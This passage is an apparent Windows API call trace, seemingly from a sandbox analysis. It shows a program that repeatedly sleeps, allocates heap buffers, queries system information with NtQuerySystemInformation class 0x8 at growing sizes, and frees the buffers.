1 [0301.564] Sleep (dwMilliseconds=0x110) [0301.590] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0301.590] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0301.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0301.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0301.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0301.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0301.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0301.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0301.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.600] Sleep (dwMilliseconds=0x110) [0301.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0301.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0301.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0301.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0301.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.628] Sleep (dwMilliseconds=0x110) [0301.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0301.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0301.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0301.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0301.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0301.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0301.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0301.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0301.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.640] Sleep (dwMilliseconds=0x110) [0301.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0301.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0301.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0301.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0301.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0301.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0301.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0301.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0301.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.671] Sleep (dwMilliseconds=0x110) [0301.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0301.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0301.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0301.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0301.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0301.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0301.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.692] Sleep (dwMilliseconds=0x110) [0301.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0301.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0301.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0301.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0301.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0301.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0301.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0301.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0301.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.703] Sleep (dwMilliseconds=0x110) [0301.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0301.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0301.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0301.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0301.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0301.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0301.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0301.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0301.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.719] Sleep (dwMilliseconds=0x110) [0301.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0301.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0301.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0301.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0301.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0301.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0301.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.741] Sleep (dwMilliseconds=0x110) [0301.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0301.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0301.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0301.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0301.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0301.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0301.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0301.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0301.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.751] Sleep (dwMilliseconds=0x110) [0301.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0301.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0301.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0301.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0301.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0301.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0301.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0301.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0301.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.767] Sleep (dwMilliseconds=0x110) [0301.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0301.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0301.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0301.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0301.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0301.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0301.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0301.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0301.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.787] Sleep (dwMilliseconds=0x110) [0301.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0301.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0301.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0301.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0301.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0301.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0301.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0301.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0301.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.844] Sleep (dwMilliseconds=0x110) [0301.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0301.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0301.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0301.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0301.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0301.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0301.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0301.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0301.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.865] Sleep (dwMilliseconds=0x110) [0301.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0301.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0301.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0301.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0301.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0301.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0301.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0301.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: 